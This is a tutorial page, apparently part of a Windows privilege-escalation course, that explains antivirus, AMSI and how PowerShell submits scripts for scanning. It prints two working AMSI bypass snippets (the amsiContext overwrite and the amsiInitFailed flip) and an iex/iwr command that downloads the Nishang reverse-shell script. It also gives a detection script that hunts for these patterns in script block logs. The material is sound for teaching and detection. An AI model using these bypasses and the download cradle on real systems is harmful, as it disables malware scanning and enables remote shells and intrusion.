17 - AMSI Bypass

Topics

  1. Introduction to the Windows Shells

  2. Windows Permissions

  3. Reverse Shells in Windows

  4. SeImpersonatePrivilege Exploitation

  5. On Cross Compilation

  6. Windows Services

  7. Weak Service Permissions

  8. Unquoted Service Path

  9. DLL Hijacking

  10. Always Install Elevated

  11. Files with Sensitive Data

  12. Windows Hashes

  13. Stored Credentials and the Windows Vault

  14. Scheduled Task

  15. Critical Registry Paths

  16. Useful Tools

  17. AMSI Bypass

What is an Antivirus?

An antivirus is software designed to detect, prevent, and remove malicious software (malware). Its purpose is to protect systems from threats such as viruses, worms, trojans, spyware, and ransomware.

Modern antivirus software employs various detection techniques:

  1. Signature-Based Detection: Matches files against a database of known malware signatures (e.g., file hashes such as MD5 or SHA-256, or characteristic byte sequences).

  2. Static Analysis: Examines file properties and code structure (imports, strings, packers, entropy) for suspicious patterns without running the sample.

  3. Dynamic Analysis: Observes program behavior at run time, on the host or in an isolated sandbox, to identify malicious actions such as process injection or persistence changes.

  4. Machine Learning Models: Classifiers trained on features of known-good and known-bad samples, used to flag previously unseen threats.

Antivirus software often works in tandem with other security solutions:

  • Firewalls: Block unauthorized network traffic.

  • Endpoint Detection and Response (EDR): Provides advanced threat hunting and endpoint protection.

  • Intrusion Detection/Prevention Systems (IDPS): Monitor networks for malicious activity.

  • Web Application Firewalls (WAF): Protect web applications from common attacks like SQL injection and cross-site scripting (XSS).


Antivirus in Windows

Windows includes several built-in security technologies to safeguard users:

  1. Microsoft Defender Antivirus (formerly Windows Defender): Real-time protection against malware, and the default AMSI provider.

  2. Firewall & Network Protection: Blocks unauthorized inbound and outbound traffic.

  3. Secure Boot: Verifies the signatures of the boot loader and early-boot components so unsigned or tampered code cannot run during startup.

  4. BitLocker: Encrypts disks to protect sensitive data at rest.

  5. Windows Hello: Password-free sign-in using a PIN or biometrics.

Windows Antimalware Scan Interface (AMSI)

Introduced with Windows 10 in 2015, AMSI is a vendor-neutral interface that lets an application hand content to whichever antimalware provider is registered on the system (Microsoft Defender by default, or a third-party product) and get a verdict back before it acts on that content. It is a user-mode library (amsi.dll) loaded into the calling process, not a kernel component, and it scans only what an application chooses to submit: script text, in-memory buffers, or the decoded form of obfuscated code at the moment it is about to run.

Key Features of AMSI:

  • Integrated into PowerShell, Windows Script Host (VBScript/JScript), WMI, Office macros (VBA), the .NET runtime and UAC.

  • Hands the submitted content to the registered antivirus/EDR provider for a dynamic scan.

  • Sees scripts after deobfuscation, which makes it effective against script-based attacks in PowerShell or JScript that would evade on-disk file scanning.

Workflow:

  1. The application calls AmsiInitialize once, opens a session, and submits the content with AmsiScanBuffer or AmsiScanString (PowerShell does this for every script block before it is executed).

  2. amsi.dll forwards the request to the registered antivirus provider.

  3. The provider scans the data and returns an AMSI_RESULT; if it reports the content as detected, the application refuses to run it.

Examples of AMSI Scanning:

  • PowerShell scripts and script blocks

  • Office macros (e.g., VBA)

  • .NET assemblies loaded from memory (Assembly.Load, since .NET Framework 4.8)

  • VBScript and JScript run by Windows Script Host


AMSI Bypass

Despite AMSI's robust design, attackers have developed techniques to bypass its protections. Because amsi.dll runs inside the very process whose content it scans, code that is already executing in that process can tamper with it without any privilege: the classic PowerShell bypasses use .NET reflection to reach PowerShell's private AMSI state, or write directly to AMSI-related memory so that the scan call fails or is skipped.

Modifying amsiContext

PowerShell's AMSI integration lives in the internal System.Management.Automation.AmsiUtils class, which stores the HAMSICONTEXT handle returned by AmsiInitialize in a private static field named amsiContext. The native structure that handle points to starts with a signature that amsi.dll validates on every AmsiScanBuffer call; overwriting those bytes makes every subsequent scan call fail with an error, and PowerShell treats a failed scan as "not detected". Note that the handle value itself is left alone; it is the memory it points to that is clobbered:

# Enumerate the non-public static fields of AmsiUtils (amsiContext, amsiSession, amsiInitFailed, ...)
$fields=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetFields('NonPublic,Static')
# Select the amsiContext field (the original's "*Context" wildcard matches the same field; FieldInfo renders as "IntPtr amsiContext")
$amsiContext=$fields | Where-Object { $_.Name -eq "amsiContext" }
# Read the handle: a pointer to the native AMSI context structure
[IntPtr]$amsiContextPointer=$amsiContext.GetValue($null)
# Overwrite the first 4 bytes of that structure (its "AMSI" signature) with zeros
[Int32[]]$emptyBuffer = @(0)
[System.Runtime.InteropServices.Marshal]::Copy($emptyBuffer, 0, $amsiContextPointer, 1)

Setting amsiInitFailed

AmsiUtils also keeps a private static bool, amsiInitFailed, that records whether AmsiInitialize failed when the process started. PowerShell checks it before every scan and skips AMSI entirely when it is set, so flipping it to true through reflection disables scanning for the rest of the process:

# Locate the private static amsiInitFailed field via reflection
$amsiInitFailedField=[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetFields('NonPublic,Static') | Where-Object { $_.Name -eq "amsiInitFailed" }
# Static field, so the instance argument is $null; from here on every scan is skipped as if AMSI had never initialised
$amsiInitFailedField.SetValue($null, $true)

Demonstration of AMSI Blocking a Malicious Script

Attempting to load a malicious script such as Invoke-PowerShellTcp.ps1 (a reverse shell from the Nishang framework) makes PowerShell submit the downloaded script block to AMSI; Defender reports it as malicious and PowerShell refuses to run it:

iex (iwr "https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1" -UseBasicParsing).Content

Error (a ParserError with the ID ScriptContainedMaliciousContent):

This script contains malicious content and has been blocked by your antivirus software.

With either bypass applied beforehand in the same PowerShell process, the scan step reports "not detected" and the script loads. Two caveats for practitioners: the change is process-local and unprivileged (AMSI keeps working in every other process, and nothing has been disabled system-wide), and Script Block Logging still records both the bypass and everything run after it. The two snippets above, typed verbatim, are themselves flagged by current Defender signatures, which is why real-world variants obfuscate the identifying strings (AmsiUtils, amsiInitFailed) or patch AmsiScanBuffer in amsi.dll in memory instead.
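From the defender's side, the same bypasses are easy to spot in PowerShell Script Block Logging (event ID 4104 in Microsoft-Windows-PowerShell/Operational). The following detection logic is an added example, not part of the original page: it runs a small set of indicators over 4104 script block text, first over constructed sample events embedded in the script, and optionally over the live log. The indicator names and the functions Find-AmsiBypassIndicator and Get-ScriptBlockEvent are this example's own; the sample events and the example.invalid URL are constructed, not real telemetry.

```powershell
# Added example (not from the original page): hunt for the AMSI bypass patterns
# above in PowerShell Script Block Logging (event ID 4104). Sample events are
# constructed for this example; Get-ScriptBlockEvent reads real ones on a host
# with Script Block Logging enabled. Function and indicator names are this example's own.

# Literals are assembled from fragments: PowerShell submits this script's own text to
# AMSI, and the complete bypass one-liners are signatured, so a hunting script that
# quotes them verbatim is refused before it runs (assumption: the split form is not).
$amsiUtils  = -join ('System.Management.Automation.', 'Amsi', 'Utils')
$initFailed = -join ('amsi', 'Init', 'Failed')
$ctxField   = -join ('amsi', 'Context')

$bypassIndicators = @(
    [pscustomobject]@{ Name = 'AmsiUtils reflection';  Pattern = [regex]::Escape($amsiUtils) }
    [pscustomobject]@{ Name = 'amsiInitFailed flip';   Pattern = "(?s)$initFailed.*SetValue" }
    [pscustomobject]@{ Name = 'amsiContext overwrite'; Pattern = "(?s)$ctxField.*Marshal\]::Copy" }
    [pscustomobject]@{ Name = 'Download cradle';       Pattern = '(?is)\b(iex|Invoke-Expression)\b.*\b(iwr|Invoke-WebRequest|DownloadString)\b' }
)

function Find-AmsiBypassIndicator {
    # Input: objects with TimeCreated, ProcessId and ScriptBlockText.
    # Output: one row per (event, indicator) match.
    param([Parameter(Mandatory, ValueFromPipeline)][psobject]$Record)
    process {
        foreach ($indicator in $bypassIndicators) {
            if ($Record.ScriptBlockText -match $indicator.Pattern) {
                [pscustomobject]@{
                    TimeCreated = $Record.TimeCreated
                    ProcessId   = $Record.ProcessId
                    Indicator   = $indicator.Name
                    Snippet     = ($Record.ScriptBlockText -split "`n")[0].Trim()
                }
            }
        }
    }
}

function Get-ScriptBlockEvent {
    # Reads real 4104 events; for this event ID Properties[2] carries the script block text.
    param([datetime]$Since = (Get-Date).AddDays(-1))
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104; StartTime = $Since } -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                TimeCreated     = $_.TimeCreated
                ProcessId       = $_.ProcessId
                ScriptBlockText = [string]$_.Properties[2].Value
            }
        }
}

# Constructed sample events (not real telemetry): one benign block, the two bypasses
# from this page, and the download cradle used in the demonstration.
$sampleEvents = @(
    [pscustomobject]@{ TimeCreated = [datetime]'2024-03-01 09:12:00'; ProcessId = 4412
                       ScriptBlockText = 'Get-Process | Sort-Object CPU -Descending | Select-Object -First 5' }
    [pscustomobject]@{ TimeCreated = [datetime]'2024-03-01 09:14:07'; ProcessId = 5120
                       ScriptBlockText = "[Ref].Assembly.GetType('$amsiUtils').GetField('$initFailed','NonPublic,Static').SetValue(`$null,`$true)" }
    [pscustomobject]@{ TimeCreated = [datetime]'2024-03-01 09:15:30'; ProcessId = 5120
                       ScriptBlockText = "`$f=[Ref].Assembly.GetType('$amsiUtils').GetFields('NonPublic,Static')`n`$p=(`$f | Where-Object { `$_.Name -eq '$ctxField' }).GetValue(`$null)`n[Runtime.InteropServices.Marshal]::Copy([Int32[]]@(0), 0, `$p, 1)" }
    [pscustomobject]@{ TimeCreated = [datetime]'2024-03-01 09:16:02'; ProcessId = 5120
                       ScriptBlockText = 'iex (iwr "https://example.invalid/payload.ps1" -UseBasicParsing).Content' }
)

$sampleEvents | Find-AmsiBypassIndicator | Format-Table -AutoSize
# On a live host: Get-ScriptBlockEvent | Find-AmsiBypassIndicator
```

Against the sample events, the benign block produces no row, the amsiInitFailed one-liner hits both the reflection and the flip indicators, the amsiContext block hits the reflection and overwrite indicators, and the last event hits the cradle indicator; the shared process ID 5120 is the pivot for the rest of the investigation. Reflection terms such as GetField and Marshal are also on PowerShell's built-in suspicious-content list, so these blocks are already logged at Warning level even before any custom rule, and a bypass does nothing to stop that logging.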


Other Resources

Disclaimer

❗ Never use tools and techniques on real IP addresses, hosts or networks without proper authorization!
